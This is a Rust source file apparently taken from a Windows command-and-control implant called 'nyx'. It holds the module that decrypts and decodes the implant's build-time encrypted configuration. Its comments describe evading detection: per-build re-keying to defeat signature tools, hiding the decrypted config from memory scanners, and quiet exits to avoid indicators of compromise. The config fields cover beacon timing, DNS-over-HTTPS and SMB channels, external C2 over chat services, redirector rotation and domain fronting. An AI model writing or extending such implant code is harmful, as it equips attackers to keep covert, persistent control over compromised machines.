//! Per-build implant configuration.
//!
//! The config is baked at build time by `build.rs`: it reads `config.toml` (or
//! `NYX_CONFIG`), serializes it into a compact binary blob, encrypts it under
//! a fresh per-build ChaCha20-Poly1305 key+nonce, and emits `OUT_DIR/
//! config_blob.rs` with `CONFIG_KEY` / `CONFIG_NONCE` / `CONFIG_CT`. This
//! module re-includes those statics and decrypts + decodes them at runtime.
//!
//! Every build re-randomizes the key/nonce, so the static config bytes in the
//! final binary (and the surrounding layout) differ every build even when the
//! config values are identical — defeating static extractors/signature tools.
//!
//! Layout (must match `build.rs::bake_config`):
//! `str(host) | u16(port) | str(uri) | u32(sleep) | u8(jitter) | u8(tls)`

#![cfg(target_os = "windows")]

use crate::heap::{String, Vec};
use nyx_protocol::wire::{Reader, WireError}; // WireError kept for decode()'s Result

/// Build config baked into the implant at build time. The `server_pub` is baked
/// separately by `build.rs` (into `server_pub::SERVER_PUB`); it lives here so
/// the beacon loop has one place to read the full transport+session config.
///
/// For per-implant (server-patched) configs, additional fields (auth_token,
/// features_bitmap, keying_levels, expires_at) are provided by
/// [`crate::config_placeholder::ImplantConfig`].
pub struct Config {
    pub server_host: String,
    pub server_port: u16,
    pub beacon_uri: String,
    pub server_pub: [u8; 32],
    pub sleep_seconds: u32,
    pub jitter_pct: u8,
    pub use_tls: bool,
    // ---- Channel dispatcher config (spec-1) ----
    /// Primary channel (Channel enum u8 value). Default 0 = Https.
    pub primary_channel: u8,
    /// Fallback bitmap: bit N set = Channel N is in the fallback chain.
    pub fallback_bitmap: u8,
    /// DoH resolver host (e.g. "cloudflare-dns.com"). Empty = not configured.
    pub doh_resolver: String,
    /// SMB pipe path (e.g. `\\.\pipe\nyx_abc`). Empty = not configured.
    pub smb_pipe_name: String,
    /// External C2 API host (e.g. "slack.com"). Empty = not configured.
    pub extc2_api_host: String,
    /// External C2 token (bot token / webhook secret). Empty = not configured.
    pub extc2_token: String,
    // ---- HTTP channel enhancements (spec-7) ----
    /// Comma-separated redirector hosts for host rotation (CS 4.10-style).
    /// e.g. "cdn1.example.com,cdn2.example.com,cdn3.example.com". Empty = no
    /// rotation, always use server_host directly.
    pub rotation_hosts: String,
    /// Domain-fronting Host header value. When non-empty, this is sent as the
    /// HTTP `Host:` header (and SNI) while the TCP connection goes to
    /// `server_host` (the fronting CDN's IP). Empty = no fronting.
    pub fronting_host: String,
    /// Explicit HTTP proxy in `host:port` format. Empty = use WinInet default
    /// (WINHTTP_ACCESS_TYPE_DEFAULT_PROXY). When set, WinHTTP routes through
    /// this proxy.
    pub proxy_server: String,
}

mod baked {
    // Generated by build.rs into OUT_DIR/config_blob.rs.
    include!(concat!(env!("OUT_DIR"), "/config_blob.rs"));
}

/// Decrypt + decode the embedded config blob into a [`Config`]. Called once at
/// entry (`beacon_loop` bootstrap). A failure here is fatal: either the
/// embedded config was tampered with (Poly1305 tag mismatch) or the build is
/// broken (blob shape wrong). On either, the implant exits with a distinct
/// NTSTATUS-style code via ExitProcess → TerminateProcess → int3 — it cannot
/// beacon without a config, and a clean exit is preferable to a hang (which is
/// a louder IOC than a quiet termination).
///
/// Returns `(Config, Vec<u8>)` — the decoded config and the raw decrypted
/// plaintext bytes. The caller MUST leak the `Vec<u8>` (via
/// [`mem::register_owned`]) so the plaintext sits in maskable memory for the
/// process lifetime. This prevents memory scanners from reading the decrypted
/// config at rest.
pub fn load() -> (Config, Vec<u8>) {
    // CRITICAL-1 fix: decrypt now returns Result instead of panicking on AEAD
    // tag mismatch. Under panic=abort a corrupted embedded config used to tear
    // the process down with no diagnostic; we now exit with a dedicated code
    // (0xC000_0002) so a config-tamper is identifiable from the exit status.
    let plain: Vec<u8> = match nyx_config::decrypt(
        &baked::CONFIG_KEY,
        &baked::CONFIG_NONCE,
        baked::CONFIG_CT,
    ) {
        Ok(p) => p,
        Err(_) => fatal_config(0xC000_0002), // AEAD tag mismatch / tampered config
    };
    match decode(&plain) {
        Ok(c) => (c, plain),
        Err(_) => fatal_config(0xC000_0001), // decrypted but shape wrong (broken build)
    }
}

/// Fatal config-load path. Resolves ExitProcess → TerminateProcess → int3 and
/// exits with `code` (an NTSTATUS-style value so it is distinguishable from
/// the `0xNN` selftest bitmasks in `selftests.rs`). Never returns.
///
/// `code` choices:
///   `0xC000_0001` = decrypted OK but the plaintext shape is wrong (broken build).
///   `0xC000_0002` = AEAD tag mismatch (tampered/corrupted embedded config).
fn fatal_config(code: u32) -> ! {
    unsafe {
        if let Some(addr) = crate::resolve::export_addr(b"kernel32.dll", b"ExitProcess") {
            let f: extern "system" fn(u32) -> ! = core::mem::transmute(addr);
            f(code);
        }
        // ExitProcess unresolved — try TerminateProcess (current process handle = -1).
        if let Some(addr) = crate::resolve::export_addr(b"kernel32.dll", b"TerminateProcess") {
            type FnTerm = unsafe extern "system" fn(*mut core::ffi::c_void, u32) -> i32;
            let f: FnTerm = core::mem::transmute(addr);
            f((-1isize) as *mut core::ffi::c_void, code);
        }
        // Last resort: clean crash (distinguishable from a hang IOC).
        core::arch::asm!("int3", options(noreturn));
    }
}

/// Decode a plaintext config blob into a [`Config`]. Public so a selftest can
/// feed it a synthetic blob without going through the (host-side) encryption.
pub fn decode(blob: &[u8]) -> Result<Config, WireError> {
    let mut r = Reader::new(blob);
    let server_host = r.str()?;
    let server_port = r.u16()?;
    let beacon_uri = r.str()?;
    let sleep_seconds = r.u32()?;
    let jitter_pct = r.u8()?;
    let use_tls_byte = r.u8()?;
    // Channel dispatcher fields (spec-1). These are appended after the
    // original fields. Old configs (build-time or unpatched .nyx_cfg) stop
    // after use_tls — `remaining()==0` → default to Https-only with empty
    // channel params. This is fully backward-compatible.
    let (primary_channel, fallback_bitmap, doh_resolver, smb_pipe_name, extc2_api_host, extc2_token,
         rotation_hosts, fronting_host, proxy_server) =
        if r.remaining() > 0 {
            let primary_channel = r.u8().unwrap_or(0);
            let fallback_bitmap = r.u8().unwrap_or(0);
            let doh_resolver = r.str().unwrap_or_default();
            let smb_pipe_name = r.str().unwrap_or_default();
            let extc2_api_host = r.str().unwrap_or_default();
            let extc2_token = r.str().unwrap_or_default();
            // spec-7 HTTP enhancement fields — further backward compat layer.
            let (rotation_hosts, fronting_host, proxy_server) = if r.remaining() > 0 {
                (
                    r.str().unwrap_or_default(),
                    r.str().unwrap_or_default(),
                    r.str().unwrap_or_default(),
                )
            } else {
                (String::new(), String::new(), String::new())
            };
            (
                primary_channel,
                fallback_bitmap,
                doh_resolver,
                smb_pipe_name,
                extc2_api_host,
                extc2_token,
                rotation_hosts,
                fronting_host,
                proxy_server,
            )
        } else {
            (0, 0, String::new(), String::new(), String::new(), String::new(),
             String::new(), String::new(), String::new())
        };
    Ok(Config {
        server_host,
        server_port,
        beacon_uri,
        server_pub: crate::server_pub::SERVER_PUB,
        sleep_seconds,
        jitter_pct,
        use_tls: use_tls_byte != 0,
        primary_channel,
        fallback_bitmap,
        doh_resolver,
        smb_pipe_name,
        extc2_api_host,
        extc2_token,
        rotation_hosts,
        fronting_host,
        proxy_server,
    })
}
